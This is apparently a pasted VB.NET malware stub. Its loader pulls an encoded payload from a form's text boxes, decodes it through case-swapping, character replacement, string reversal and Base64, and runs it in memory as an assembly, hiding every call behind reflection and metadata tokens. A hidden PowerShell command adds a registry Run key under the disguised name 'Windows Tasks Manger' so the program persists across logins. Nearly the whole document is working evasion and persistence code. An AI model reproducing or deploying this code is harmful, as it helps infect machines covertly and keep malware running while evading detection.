

Sep 22nd, 2016
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  1. Imports System.Linq
  2. Imports System.Reflection
  3. Imports System.Text
  5. Module Main
  6. Public CA As String = Nothing
  7. Sub main()
  9. GetType(Main).Module.ResolveMethod(100663467).Invoke(Nothing, New Object() {})
  10. Enumerable.OfType(Of TextBox)(Form1.Controls).ToList.ForEach(Sub(i)
  11. CA += i.Text
  12. End Sub)
  13. CA = GetType(Main).Module.ResolveMethod(100663463).Invoke(Nothing, New Object() {CA})
  14. CA = GetType(Main).Module.ResolveMethod(100663466).Invoke(Nothing, New Object() {CA})
  15. CA = GetType(Main).Module.ResolveMethod(100663465).Invoke(Nothing, New Object() {CA})
  16. Dim AC As Byte() = GetType(Main).Module.ResolveMethod(100663464).Invoke(Nothing, New Object() {CA})
  17. GetType(Main).Module.ResolveMethod(100663462).Invoke(Nothing, New Object() {AC, New Object() {}})
  18. End Sub
  19. Public Function InjectMe(value As Byte(), ByVal ParamArray P2() As Object) As Object
  20. Dim A = Nothing, B = Nothing, C = Nothing
  21. Enumerable.OfType(Of MethodInfo)(GetType(Assembly).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100670496 = 0 Then A = i.Invoke(Nothing, New Object() {value}))
  22. Enumerable.OfType(Of PropertyInfo)(GetType(Assembly).GetProperties).ToList.ForEach(Sub(i) If i.MetadataToken - 385877095 = 0 Then B = i.GetValue(A, Nothing))
  23. Enumerable.OfType(Of MethodInfo)(GetType(MethodInfo).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100671436 = 0 Then C = i.Invoke(B, New Object() {Nothing, P2}))
  24. Return C
  25. End Function
  26. Public Function BaseMe(ByVal str As String)
  27. Dim NewStr As New StringBuilder
  28. For i = 0 To str.Length - 1
  29. Select Case True
  30. Case str(i).ToString.ToUpper = str(i)
  31. NewStr.Append(str(i).ToString.ToLower)
  32. Case str(i).ToString.ToLower = str(i)
  33. NewStr.Append(str(i).ToString.ToUpper)
  34. Case Else
  35. NewStr.Append(str(i))
  36. End Select
  37. Next
  38. Return NewStr.ToString
  39. End Function
  40. Public Function DecryptMe(value As String) As Byte()
  41. Dim A As Byte() = Nothing
  42. Enumerable.OfType(Of MethodInfo)(GetType(Convert).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100665654 = 0 Then A = i.Invoke(Nothing, New Object() {value}))
  43. Return A
  44. End Function
  45. Public Function RevserME(value As String) As String
  46. Return StrReverse(value)
  47. End Function
  48. Public Function replaceME(value As String) As String
  49. Dim A As String = Nothing
  50. Enumerable.OfType(Of MethodInfo)(GetType(String).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100663740 = 0 Then A = i.Invoke(value, New Object() {"ً", "A"}))
  51. Return A
  52. End Function
  53. Public Function powershell()
  54. Dim PowerShellScript As String = "-windowstyle hidden ( New-ItemProperty -Path ""HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"" -Name ""$NAME$"" -Value ""$PATH$"" )"
  55. Dim name As String = "Windows Tasks Manger"
  56. Dim A As String = Nothing
  57. Enumerable.OfType(Of MethodInfo)(GetType(String).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100663740 = 0 Then A = i.Invoke(PowerShellScript, New Object() {"$PATH$", Application.ExecutablePath}))
  58. Enumerable.OfType(Of MethodInfo)(GetType(String).GetMethods).ToList.ForEach(Sub(i) If i.MetadataToken - 100663740 = 0 Then A = i.Invoke(A, New Object() {"$NAME$", name}))
  59. PowerShellScript = A
  60. Dim PSI As New ProcessStartInfo With {.FileName = "powershell", _
  61. .Arguments = PowerShellScript, _
  62. .WindowStyle = ProcessWindowStyle.Hidden}
  63. Process.Start(PSI).WaitForExit()
  65. End Function
  66. End Module
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